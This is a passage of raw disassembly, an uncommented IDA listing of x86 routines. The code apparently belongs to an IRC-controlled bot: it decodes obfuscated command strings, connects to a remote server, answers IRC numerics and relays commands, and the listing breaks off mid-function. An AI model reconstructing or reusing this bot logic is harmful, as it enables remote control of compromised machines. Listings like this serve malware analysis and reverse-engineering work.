		call	sub_403DF4
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		jz	short loc_41816F
		xor	esi, esi

loc_418126:				; CODE XREF: sub_41802D+140j
		push	eax
		push	offset aS_14	; "%s"
		lea	edi, [ebp+esi+var_1072C]
		push	0FFh
		push	edi
		call	sub_402EAE
		mov	eax, edi
		add	esp, 10h
		lea	edi, [eax+1]

loc_418146:				; CODE XREF: sub_41802D+11Ej
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418146
		sub	eax, edi
		add	eax, esi
		push	offset asc_420310 ; " "
		push	ebx
		mov	[ebp+eax+var_1072C], bl
		call	sub_403DF4
		pop	ecx
		add	esi, 100h
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_418126

loc_41816F:				; CODE XREF: sub_41802D+F5j
		xor	eax, eax
		mov	[ebp+var_2C], bl
		lea	edi, [ebp+var_2B]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_38], bl
		lea	edi, [ebp+var_37]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_54], bl
		lea	edi, [ebp+var_53]
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_20], bl
		lea	edi, [ebp+var_1F]
		stosd
		push	0FFh
		stosd
		lea	eax, [ebp+var_32B]
		push	ebx
		push	eax
		mov	[ebp+var_32C], bl
		call	sub_407F20
		add	esp, 0Ch
		push	2Fh
		lea	eax, [ebp+var_A7]
		push	ebx
		push	eax
		mov	[ebp+var_A8], bl
		call	sub_407F20
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_44], bl
		lea	edi, [ebp+var_43]
		stosd
		add	esp, 0Ch
		push	7Fh
		stosd
		lea	eax, [ebp+var_22B]
		push	ebx
		push	eax
		mov	[ebp+var_22C], bl
		call	sub_407F20
		add	esp, 0Ch
		push	9
		lea	esi, [ebp+var_2C]
		mov	ebx, offset asc_426B53 ; "ÞÇÀÉ"
		call	sub_419EC1
		pop	ecx
		push	9
		lea	esi, [ebp+var_38]
		mov	ebx, offset asc_426B65 ; "ÅÇÍÅ"
		call	sub_419EC1
		pop	ecx
		push	0Dh
		lea	esi, [ebp+var_54]
		mov	ebx, offset asc_426B80 ; "ÞÜÇØÃÝÉ"
		call	sub_419EC1
		pop	ecx
		lea	ecx, [ebp+var_2C]
		lea	eax, [ebp+var_1072C]

loc_418230:				; CODE XREF: sub_41802D+21Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_41824E
		test	dl, dl
		jz	short loc_41824A
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_41824E
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418230

loc_41824A:				; CODE XREF: sub_41802D+20Bj
		xor	eax, eax
		jmp	short loc_418253
; ---------------------------------------------------------------------------

loc_41824E:				; CODE XREF: sub_41802D+207j
					; sub_41802D+213j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418253:				; CODE XREF: sub_41802D+21Fj
		test	eax, eax
		jnz	short loc_418297
		push	9
		lea	esi, [ebp+var_20]
		mov	ebx, offset asc_426B5C ; "ÞÁÀÉ"
		call	sub_419EC1
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_1062C]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_10	; "%s %s\r\n"
		call	sub_417ABC
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41828F

loc_418288:				; CODE XREF: sub_41802D+333j
		xor	al, al
		jmp	loc_4186E0
; ---------------------------------------------------------------------------

loc_41828F:				; CODE XREF: sub_41802D+259j
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosb

loc_418297:				; CODE XREF: sub_41802D+228j
		lea	ecx, [ebp+var_38]
		lea	eax, [ebp+var_1062C]

loc_4182A0:				; CODE XREF: sub_41802D+28Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_4182BE
		test	dl, dl
		jz	short loc_4182BA
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_4182BE
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4182A0

loc_4182BA:				; CODE XREF: sub_41802D+27Bj
		xor	eax, eax
		jmp	short loc_4182C3
; ---------------------------------------------------------------------------

loc_4182BE:				; CODE XREF: sub_41802D+277j
					; sub_41802D+283j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4182C3:				; CODE XREF: sub_41802D+28Fj
		test	eax, eax
		jnz	loc_418365
		push	100h
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aNn	; "­­ÏÀÛÝ"
		call	sub_419EC1
		pop	ecx
		mov	ecx, esi
		lea	eax, [ebp+var_1052C]

loc_4182E9:				; CODE XREF: sub_41802D+2D4j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_418307
		test	dl, dl
		jz	short loc_418303
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_418307
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4182E9

loc_418303:				; CODE XREF: sub_41802D+2C4j
		xor	eax, eax
		jmp	short loc_41830C
; ---------------------------------------------------------------------------

loc_418307:				; CODE XREF: sub_41802D+2C0j
					; sub_41802D+2CCj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_41830C:				; CODE XREF: sub_41802D+2D8j
		test	eax, eax
		jnz	loc_4186DE
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset asc_426B6E ; "ÄÁÇÀ"
		call	sub_419EC1
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4265E0
		call	sub_419EC1
		mov	edi, [ebp+var_10734]
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aSSS_2	; "%s %s %s\r\n"
		call	sub_417ABC
		add	esp, 10h

loc_418358:				; CODE XREF: sub_41802D+3E0j
		test	al, al
		jnz	loc_4186DE
		jmp	loc_418288
; ---------------------------------------------------------------------------

loc_418365:				; CODE XREF: sub_41802D+298j
		push	4
		mov	edi, offset a001 ; "001"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_418412
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset asc_426B6E ; "ÄÁÇÀ"
		call	sub_419EC1
		pop	ecx
		push	9
		lea	esi, [ebp+var_44]
		mov	ebx, offset asc_426B77 ; "ÃÁÊË"
		call	sub_419EC1
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aNn	; "­­ÏÀÛÝ"
		mov	[esp+10h+var_10], 100h
		call	sub_419EC1
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4265E0
		call	sub_419EC1
		pop	ecx
		push	80h
		lea	esi, [ebp+var_22C]
		mov	ebx, offset byte_4265F9
		call	sub_419EC1
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_A8]
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [edi+5]
		push	eax
		lea	eax, [ebp+var_44]
		push	eax
		push	offset aSSSSSS	; "%s %s %s\r\n%s %s %s\r\n"
		call	sub_417ABC
		add	esp, 1Ch
		jmp	loc_418358
; ---------------------------------------------------------------------------

loc_418412:				; CODE XREF: sub_41802D+34Aj
		lea	ecx, [ebp+var_54]
		lea	eax, [ebp+var_1062C]

loc_41841B:				; CODE XREF: sub_41802D+406j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_418439
		test	dl, dl
		jz	short loc_418435
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_418439
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_41841B

loc_418435:				; CODE XREF: sub_41802D+3F6j
		xor	eax, eax
		jmp	short loc_41843E
; ---------------------------------------------------------------------------

loc_418439:				; CODE XREF: sub_41802D+3F2j
					; sub_41802D+3FEj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_41843E:				; CODE XREF: sub_41802D+40Aj
		test	eax, eax
		jz	short loc_41845A
		push	4
		mov	edi, offset a332 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_4186DE

loc_41845A:				; CODE XREF: sub_41802D+413j
		push	8
		pop	ecx
		xor	eax, eax
		mov	[ebp+var_78], 0
		lea	edi, [ebp+var_77]
		rep stosd
		mov	ebx, 0FFh
		push	ebx
		stosw
		xor	esi, esi
		lea	eax, [ebp+var_1AB]
		push	esi
		push	eax
		mov	byte ptr [ebp+var_10730], 0
		mov	[ebp+var_1AC], 0
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_62B]
		push	esi
		push	eax
		mov	[ebp+var_62C], 0
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_72B]
		push	esi
		push	eax
		mov	[ebp+var_72C], 0
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [ebp+var_1072C]
		push	offset asc_420348 ; " :"
		push	eax
		call	sub_403DF4
		push	eax
		push	offset aS_0	; "%s"
		lea	eax, [ebp+var_62C]
		push	ebx
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_62C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4184F0:				; CODE XREF: sub_41802D+4C8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4184F0
		sub	eax, esi
		mov	[ebp+eax+var_62C], cl
		lea	eax, [ebp+var_1072C]
		push	offset asc_420350 ; "!"
		push	eax
		call	sub_403DF4
		push	eax
		push	offset aS_1	; "%s"
		lea	eax, [ebp+var_78]
		push	22h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_78]
		add	esp, 18h
		lea	esi, [eax+1]

loc_41852B:				; CODE XREF: sub_41802D+503j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41852B
		sub	eax, esi
		mov	[ebp+eax+var_78], cl
		lea	eax, [ebp+var_78]
		lea	esi, [eax+1]

loc_41853E:				; CODE XREF: sub_41802D+516j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41853E
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_77]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		call	sub_403CD0
		add	esp, 0Ch
		push	4
		mov	edi, offset a332_0 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	short loc_4185A4
		lea	eax, [ebp+var_1042C]
		push	eax
		push	offset aS_2	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418591:				; CODE XREF: sub_41802D+569j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418591
		mov	byte ptr [ebp+var_10730], 1
		jmp	loc_418631
; ---------------------------------------------------------------------------

loc_4185A4:				; CODE XREF: sub_41802D+53Dj
		mov	esi, [ebp+var_10734]
		add	esi, 5
		lea	eax, [ebp+var_1052C]

loc_4185B3:				; CODE XREF: sub_41802D+59Ej
		mov	cl, [eax]
		cmp	cl, [esi]
		jnz	short loc_4185D1
		test	cl, cl
		jz	short loc_4185CD
		mov	cl, [eax+1]
		cmp	cl, [esi+1]
		jnz	short loc_4185D1
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_4185B3

loc_4185CD:				; CODE XREF: sub_41802D+58Ej
		xor	eax, eax
		jmp	short loc_4185D6
; ---------------------------------------------------------------------------

loc_4185D1:				; CODE XREF: sub_41802D+58Aj
					; sub_41802D+596j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4185D6:				; CODE XREF: sub_41802D+5A2j
		test	eax, eax
		jnz	short loc_418605
		lea	eax, [ebp+var_78]
		push	eax
		push	offset aS_3	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_4185FC:				; CODE XREF: sub_41802D+5D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4185FC
		jmp	short loc_418631
; ---------------------------------------------------------------------------

loc_418605:				; CODE XREF: sub_41802D+5ABj
		lea	eax, [ebp+var_1052C]
		push	eax
		push	offset aS_4	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_41862A:				; CODE XREF: sub_41802D+602j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41862A

loc_418631:				; CODE XREF: sub_41802D+572j
					; sub_41802D+5D6j
		sub	eax, edx
		push	100h
		lea	esi, [ebp+var_72C]
		mov	ebx, offset byte_426631
		mov	[ebp+eax+var_1AC], 0
		call	sub_419EC1
		pop	ecx
		lea	eax, [ebp+var_62C]
		mov	ecx, esi
		call	sub_419834
		test	eax, eax
		jnz	short loc_41866A
		cmp	byte ptr [ebp+var_10730], al
		jz	short loc_4186DE

loc_41866A:				; CODE XREF: sub_41802D+633j
		xor	edi, edi
		cmp	byte ptr [ebp+var_10730], 0
		lea	eax, [ebp+var_52C]
		jz	short loc_418682
		push	offset asc_420368 ; ";"
		jmp	short loc_418687
; ---------------------------------------------------------------------------

loc_418682:				; CODE XREF: sub_41802D+64Cj
		push	offset asc_42036C ; ";"

loc_418687:				; CODE XREF: sub_41802D+653j
		push	eax
		call	sub_403DF4
		jmp	short loc_4186A3
; ---------------------------------------------------------------------------

loc_41868F:				; CODE XREF: sub_41802D+67Aj
		push	offset asc_420370 ; ";"
		push	0
		mov	[ebp+edi*4+var_10F34], eax
		call	sub_403DF4
		inc	edi

loc_4186A3:				; CODE XREF: sub_41802D+660j
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41868F
		xor	esi, esi
		test	edi, edi
		jle	short loc_4186DE

loc_4186AF:				; CODE XREF: sub_41802D+6AFj
		push	[ebp+esi*4+var_10F34]
		lea	eax, [ebp+var_1AC]
		push	eax
		lea	eax, [ebp+var_62C]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		push	[ebp+var_10730]
		push	[ebp+var_10734]
		call	sub_417E66
		inc	esi
		cmp	esi, edi
		jl	short loc_4186AF

loc_4186DE:				; CODE XREF: sub_41802D+2E1j
					; sub_41802D+32Dj ...
		mov	al, 1

loc_4186E0:				; CODE XREF: sub_41802D+25Dj
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn	4
sub_41802D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4186F1	proc near		; CODE XREF: sub_41C28D+477p

var_20414	= dword	ptr -20414h
var_20410	= dword	ptr -20410h
var_2040C	= dword	ptr -2040Ch
var_20408	= byte ptr -20408h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		mov	eax, 20414h
		call	sub_4117B0
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_407]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_20414], edi
		mov	[ebp+var_408], bl
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		push	esi
		lea	eax, [ebp+var_408]
		push	eax
		push	dword ptr [edi]
		mov	[ebp+var_2040C], ebx
		call	ds:dword_41D26C	; recv
		test	eax, eax
		jz	loc_418806
		lea	eax, [ebp+var_408]
		lea	edx, [eax+1]

loc_418759:				; CODE XREF: sub_4186F1+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418759
		sub	eax, edx
		mov	[ebp+eax+var_408], bl
		lea	eax, [ebp+var_408]
		push	offset asc_4202E4 ; "\r\n"
		push	eax
		call	sub_403DF4
		push	20000h
		mov	edi, eax
		lea	eax, [ebp+var_20408]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 14h
		cmp	edi, ebx
		mov	esi, 200h
		jz	short loc_4187DC
		lea	eax, [ebp+var_20408]
		mov	[ebp+var_20410], eax

loc_4187A6:				; CODE XREF: sub_4186F1+E9j
		push	edi
		push	offset aS_10	; "%s"
		push	1FFh
		push	[ebp+var_20410]
		call	sub_402EAE
		push	offset asc_4202EC ; "\r\n"
		push	ebx
		call	sub_403DF4
		add	[ebp+var_20410], esi
		add	esp, 18h
		inc	[ebp+var_2040C]
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_4187A6

loc_4187DC:				; CODE XREF: sub_4186F1+A7j
		cmp	[ebp+var_2040C], ebx
		jle	short loc_418802
		mov	ebx, [ebp+var_2040C]
		lea	edi, [ebp+var_20408]

loc_4187F0:				; CODE XREF: sub_4186F1+10Fj
		push	[ebp+var_20414]
		mov	ecx, edi
		call	sub_41802D
		add	edi, esi
		dec	ebx
		jnz	short loc_4187F0

loc_418802:				; CODE XREF: sub_4186F1+F1j
		mov	al, 1
		jmp	short loc_418810
; ---------------------------------------------------------------------------

loc_418806:				; CODE XREF: sub_4186F1+59j
		push	dword ptr [edi]
		call	ds:dword_41D280	; closesocket
		xor	al, al

loc_418810:				; CODE XREF: sub_4186F1+113j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_4186F1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41881F	proc near		; CODE XREF: sub_41C28D+465p

var_450		= dword	ptr -450h
var_44C		= dword	ptr -44Ch
var_448		= byte ptr -448h
var_447		= byte ptr -447h
var_444		= byte ptr -444h
var_443		= byte ptr -443h
var_440		= word ptr -440h
var_43E		= word ptr -43Eh
var_43C		= byte ptr -43Ch
var_430		= byte ptr -430h
var_42F		= byte ptr -42Fh
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_30		= byte ptr -30h
var_2F		= byte ptr -2Fh
var_24		= byte ptr -24h
var_23		= byte ptr -23h
var_18		= byte ptr -18h
var_17		= byte ptr -17h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 454h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		push	0
		push	1
		mov	edi, ecx
		push	2
		mov	[ebp+var_450], edi
		mov	ebx, edx
		mov	[ebp+var_44C], eax
		call	ds:dword_41D220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[edi], eax
		jnz	short loc_418869
		push	eax

loc_41885C:				; CODE XREF: sub_41881F+8Bj
		call	ds:dword_41D280	; closesocket
		xor	al, al
		jmp	loc_418A7B
; ---------------------------------------------------------------------------

loc_418869:				; CODE XREF: sub_41881F+3Aj
		push	1FFh
		lea	eax, [ebp+var_22F]
		push	0
		push	eax
		mov	[ebp+var_230], 0
		call	sub_407F20
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_230]
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41D244	; gethostbyname
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		jnz	short loc_4188AC

loc_4188A8:				; CODE XREF: sub_41881F+E7j
		push	dword ptr [edi]
		jmp	short loc_41885C
; ---------------------------------------------------------------------------

loc_4188AC:				; CODE XREF: sub_41881F+87j
		push	200h
		lea	eax, [ebp+var_230]
		push	ebx
		push	eax
		call	sub_407F20
		movsx	eax, word ptr [esi+0Ah]
		add	esp, 0Ch
		push	eax
		mov	eax, [esi+0Ch]
		push	dword ptr [eax]
		lea	eax, [ebp+var_43C]
		push	eax
		call	sub_407FA0
		add	esp, 0Ch
		push	[ebp+arg_4]
		mov	[ebp+var_440], 2
		call	ds:dword_41D270	; htons
		mov	[ebp+var_43E], ax
		push	10h
		lea	eax, [ebp+var_440]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41D23C	; connect
		test	eax, eax
		jnz	short loc_4188A8
		mov	eax, [ebp+var_44C]
		lea	edx, [eax+1]

loc_418911:				; CODE XREF: sub_41881F+F7j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418911
		sub	eax, edx
		jz	short loc_418987
		xor	eax, eax
		mov	[ebp+var_18], bl
		lea	edi, [ebp+var_17]
		stosd
		push	1FFh
		stosd
		lea	eax, [ebp+var_42F]
		push	ebx
		push	eax
		mov	[ebp+var_430], bl
		call	sub_407F20
		mov	ebx, [ebp+var_44C]
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_430]
		call	sub_419EC1
		pop	ecx
		push	9
		lea	esi, [ebp+var_18]
		mov	ebx, offset asc_426B41 ; "ÞÏÝÝ"
		call	sub_419EC1
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	eax, [ebp+var_430]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_8	; "%s %s\r\n"
		call	sub_417ABC
		add	esp, 0Ch
		xor	ebx, ebx

loc_418987:				; CODE XREF: sub_41881F+FBj
		xor	eax, eax
		mov	[ebp+var_24], bl
		lea	edi, [ebp+var_23]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_30], bl
		lea	edi, [ebp+var_2F]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_C], bl
		lea	edi, [ebp+var_B]
		stosd
		stosw
		xor	eax, eax
		push	ebx
		mov	[ebp+var_448], bl
		lea	edi, [ebp+var_447]
		stosw
		push	3
		mov	[ebp+var_444], bl
		lea	edi, [ebp+var_443]
		pop	ecx
		lea	esi, [ebp+var_448]
		stosw
		call	sub_419641
		pop	ecx
		push	ebx
		push	3
		lea	esi, [ebp+var_444]
		call	sub_41960F
		xor	eax, eax
		lea	edi, [ebp+var_C]
		stosd
		stosw
		stosb
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_448]
		push	eax
		push	offset aSS_9	; "%s-%s"
		lea	eax, [ebp+var_C]
		push	6
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_C]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_418A0E:				; CODE XREF: sub_41881F+1F4j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418A0E
		sub	eax, esi
		mov	[ebp+eax+var_C], bl
		xor	eax, eax
		lea	edi, [ebp+var_448]
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_444]
		stosw
		push	9
		lea	esi, [ebp+var_24]
		mov	ebx, offset asc_426B38 ; "ÀÇÍÅ"
		stosb
		call	sub_419EC1
		pop	ecx
		push	9
		lea	esi, [ebp+var_30]
		mov	ebx, offset asc_426B4A ; "ÛÝËÜ"
		call	sub_419EC1
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	ebx, [edi+5]
		call	sub_417C7B
		push	ebx
		lea	eax, [ebp+var_C]
		push	eax
		mov	eax, esi
		push	eax
		push	ebx
		lea	eax, [ebp+var_24]
		push	eax
		push	offset aSSSS00S	; "%s %s\r\n%s %s 0 0 :%s\r\n"
		call	sub_417ABC
		add	esp, 18h
		mov	al, 1

loc_418A7B:				; CODE XREF: sub_41881F+45j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn	8
sub_41881F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418A8C	proc near		; CODE XREF: sub_418AF1+3Ep

var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_10], eax
		xor	eax, eax
		mov	[ebp+var_C], 0
		lea	edi, [ebp+var_B]
		push	5
		lea	esi, [ebp+var_C]
		mov	ebx, offset asc_426B38 ; "ÀÇÍÅ"
		stosd
		call	sub_419EC1
		mov	ebx, [ebp+var_10]
		pop	ecx
		add	ebx, 5
		call	sub_417C7B
		push	ebx
		mov	eax, esi
		push	eax
		push	offset aSS_7	; "%s %s\r\n"
		mov	edi, offset dword_427FFC
		call	sub_417ABC
		mov	ecx, [ebp+var_4]
		add	esp, 0Ch
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn	4
sub_418A8C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_418AF1	proc near		; DATA XREF: sub_41C28D+3B5o
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	esi
		push	edi
		call	sub_419590
		mov	edi, dword_427BD8
		mov	esi, dword_427BDC

loc_418B0A:				; CODE XREF: sub_418AF1+5Aj
		call	sub_419590
		cmp	dword_427BDC, esi
		jl	short loc_418B34
		jg	short loc_418B21
		cmp	dword_427BD8, edi
		jbe	short loc_418B34

loc_418B21:				; CODE XREF: sub_418AF1+26j
		cmp	byte_428000, 0
		jz	short loc_418B34
		push	offset dword_427FFC
		call	sub_418A8C

loc_418B34:				; CODE XREF: sub_418AF1+24j
					; sub_418AF1+2Ej ...
		mov	edi, dword_427BD8
		mov	esi, dword_427BDC
		push	0C350h
		call	ds:off_41D0F8
		jmp	short loc_418B0A
sub_418AF1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418B4D	proc near		; CODE XREF: sub_4192DB+1Ep

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	offset word_427CD4
		push	dword_427DEC
		mov	[ebp+var_4], 10h
		call	ds:dword_41D234	; accept
		leave
		retn
sub_418B4D	endp


; =============== S U B	R O U T	I N E =======================================



sub_418B6F	proc near		; CODE XREF: sub_418D42+1D2p

arg_0		= dword	ptr  4

		jmp	short loc_418B74
; ---------------------------------------------------------------------------

loc_418B71:				; CODE XREF: sub_418B6F+14j
		mov	byte ptr [eax],	5Ch

loc_418B74:				; CODE XREF: sub_418B6Fj
		push	2Fh
		push	[esp+4+arg_0]
		call	sub_403C10
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_418B71
		retn
sub_418B6F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418B86	proc near		; CODE XREF: sub_418D42+192p

var_C		= byte ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_2		= byte ptr -2
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		mov	eax, esi
		push	edi
		lea	ecx, [eax+1]

loc_418B97:				; CODE XREF: sub_418B86+16j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_418B97
		sub	eax, ecx
		inc	eax
		push	eax
		call	sub_402A08
		mov	ebx, eax
		push	ebx
		call	sub_402E05
		push	eax
		push	0
		push	ebx
		call	sub_407F20
		push	25h
		push	esi
		call	sub_403C10
		add	esp, 1Ch
		test	eax, eax
		jnz	short loc_418C10

loc_418BC7:				; CODE XREF: sub_418B86+114j
		mov	eax, esi
		mov	edx, esi

loc_418BCB:				; CODE XREF: sub_418B86+4Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418BCB
		mov	edi, ebx
		sub	eax, edx
		dec	edi

loc_418BD7:				; CODE XREF: sub_418B86+57j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_418BD7
		mov	ecx, eax
		shr	ecx, 2
		mov	esi, edx
		mov	edx, [ebp+arg_0]
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		xor	eax, eax
		mov	edi, edx
		stosd
		mov	eax, ebx
		sub	edx, ebx

loc_418BFB:				; CODE XREF: sub_418B86+7Dj
		mov	cl, [eax]
		mov	[edx+eax], cl
		inc	eax
		test	cl, cl
		jnz	short loc_418BFB
		xor	esi, esi
		inc	esi
		jmp	loc_418CA1
; ---------------------------------------------------------------------------

loc_418C0D:				; CODE XREF: sub_418B86+10Ej
		mov	eax, [ebp+var_8]

loc_418C10:				; CODE XREF: sub_418B86+3Fj
		mov	byte ptr [eax],	0
		mov	ecx, esi

loc_418C15:				; CODE XREF: sub_418B86+94j
		mov	dl, [ecx]
		inc	ecx
		test	dl, dl
		jnz	short loc_418C15
		sub	ecx, esi
		mov	edi, ebx
		mov	edx, ecx
		dec	edi

loc_418C23:				; CODE XREF: sub_418B86+A3j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_418C23
		mov	ecx, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		inc	eax
		push	2
		push	eax
		mov	[ebp+var_8], eax
